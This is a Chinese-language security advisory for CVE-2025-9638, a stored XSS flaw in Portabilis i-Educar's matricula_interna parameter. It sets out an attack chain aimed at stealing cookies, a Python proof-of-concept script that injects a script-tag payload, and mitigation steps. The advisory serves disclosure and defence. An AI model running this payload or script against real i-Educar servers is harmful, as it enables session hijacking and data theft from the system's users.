CVE-2025-9638 Portabilis i-Educar 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-9638

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

4.8 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

Portabilis i-Educar

漏洞概述

CVE-2025-9638是Portabilis i-Educar软件中的一个存储型跨站脚本（Stored Cross-Site Scripting）漏洞，CVSS评分为4.8，属于中等严重程度。该漏洞存在于educar_usuario_cad.php端点中的matricula_interna参数，由于应用程序未能正确对用户输入进行安全过滤和转义，导致攻击者可以注入恶意的JavaScript代码。当其他用户访问包含恶意脚本的页面时，攻击代码将在受害者浏览器中执行，可能导致会话劫持、敏感信息窃取、钓鱼攻击等严重后果。由于该漏洞为存储型XSS，恶意代码会被永久保存在服务器端，所有访问受影响页面的用户都会受到攻击影响。此漏洞需要高权限用户才能触发，但一旦成功利用，攻击影响范围广泛，可波及所有访问相关页面的用户。

技术细节

该漏洞属于典型的存储型XSS（Stored XSS）漏洞。攻击者通过matricula_interna参数向educar_usuario_cad.php端点提交包含恶意JavaScript代码的输入。应用程序在接收用户输入后，未对特殊字符进行HTML实体编码或输出过滤，直接将用户提交的数据存储到数据库。当其他用户访问包含该数据的页面时，服务器从数据库读取数据并嵌入到HTML响应中返回给客户端浏览器。由于恶意脚本未经任何过滤直接嵌入HTML页面，浏览器将其作为合法脚本执行，从而实现XSS攻击。攻击者可以利用此漏洞窃取用户会话Cookie、劫持用户账户、进行钓鱼欺骗或在用户浏览器中执行任意JavaScript代码。由于需要高权限（PR:H）才能触发漏洞，攻击者通常需要先获取管理员或高权限账户，但一旦成功注入，所有访问受影响页面的用户都会受到攻击影响。

攻击链分析

STEP 1

步骤1

攻击者获取i-Educar系统的高权限账户访问权限

STEP 2

步骤2

攻击者构造包含恶意JavaScript代码的XSS payload

STEP 3

步骤3

攻击者通过educar_usuario_cad.php端点的matricula_interna参数提交恶意payload

STEP 4

步骤4

应用程序未对输入进行安全过滤，直接将恶意代码存储到数据库

STEP 5

步骤5

其他用户访问包含恶意数据的页面时，浏览器执行注入的JavaScript代码

STEP 6

步骤6

攻击者通过XSS成功窃取用户Cookie、会话令牌或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-9638 PoC - Stored XSS in i-Educar
# Target: Portabilis i-Educar 2.10.0
# Endpoint: educar_usuario_cad.php
# Parameter: matricula_interna

target_url = "http://target-server/educar_usuario_cad.php"

# Malicious XSS payload
xss_payload = '<script>alert(document.cookie)</script>'

def exploit_stored_xss():
    """Exploit CVE-2025-9638 - Stored XSS in matricula_interna parameter"""
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'Cookie': 'PHPSESSID=your_session_cookie_here'
    }
    
    # Data payload with XSS in matricula_interna parameter
    data = {
        'matricula_interna': xss_payload,
        'operacao': 'cadastrar',
        'submit': '1'
    }
    
    try:
        # Send POST request to inject XSS payload
        response = requests.post(target_url, data=data, headers=headers, timeout=10)
        
        if response.status_code == 200:
            print('[+] XSS payload injected successfully')
            print('[+] Payload stored in database')
            print('[+] Any user viewing this record will trigger the XSS')
            return True
        else:
            print('[-] Failed to inject payload')
            return False
    except requests.exceptions.RequestException as e:
        print(f'[-] Error: {e}')
        return False

if __name__ == '__main__':
    print('CVE-2025-9638 PoC - i-Educar Stored XSS')
    exploit_stored_xss()

影响范围

Portabilis i-Educar 2.10.0

防御指南

临时缓解措施

在官方补丁发布前，可临时采取以下措施缓解风险：1）对educar_usuario_cad.php端点实施严格的访问控制，限制低权限用户访问；2）在Web应用防火墙（WAF）层面配置XSS防护规则，过滤包含<script>标签和JavaScript事件处理器的请求；3）对所有用户输入实施白名单过滤策略，拒绝非常规字符输入；4）启用浏览器的XSS过滤器作为临时防护；5）加强对高权限账户的安全管理，实施多因素认证；6）监控应用日志，及时发现异常请求和攻击行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-9638
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-9638
3 Details https://www.cvedetails.com/cve/CVE-2025-9638/
4 VulDB https://vuldb.com/cve/CVE-2025-9638
5 Link https://fluidattacks.com/advisories/travis
6 Link https://github.com/portabilis/i-educar
7 Link https://fluidattacks.com/advisories/travis